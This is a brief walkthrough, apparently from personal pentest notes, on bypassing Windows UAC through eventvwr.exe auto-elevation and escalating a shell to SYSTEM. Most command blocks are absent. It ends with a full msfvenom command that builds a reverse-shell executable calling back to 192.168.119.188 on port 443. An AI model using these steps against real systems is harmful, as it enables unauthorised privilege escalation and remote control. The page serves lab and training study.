Bypassuac using eventviewer.exe
In a scenario where you have gained shell for a user belonging to an administrator group but with UAC enabled, then you will be prompted for consent everytime an application/process is initiated through that shell. In order to be able to bypass this the following has to be done,
Elevate command shell from medium to high integrity
Elevate from high integrity to system
When you enumerate your privileges through that shell you will only find a few privileges enabled.
You can check whether UAC is enabled by executing the following command,
If the output shows,
then UAC is enabled, else you can expect the following output,
We are going to use a C variant of the exploit to elevate the privileges. The C code can be found here.
You can check whether the event viewer has auto elevate enable through the following commands,
The path to the executable should be "C:\Windows\System32\eventvwr.exe"
This should display that the flag - [autoElevate]true[/autoElevate] is set.
In the above C code change the following and compile,
Compile in Kali using,
Setup netcat on the port that you have used within the reverse_shell.exe.
After transfering the file and executing it, you should get a reverse shell on the listening port. Now listing the privileges should display a lot more than before.
Again, from this shell we need to initiate another reverse shell using the following command,
The obtained shell should be a system shell.
You can generate the reverse_shell executables using the following msfvenom command,
msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=192.168.119.188 LPORT=443 -f exe -o reverse_shell.exe
Last updated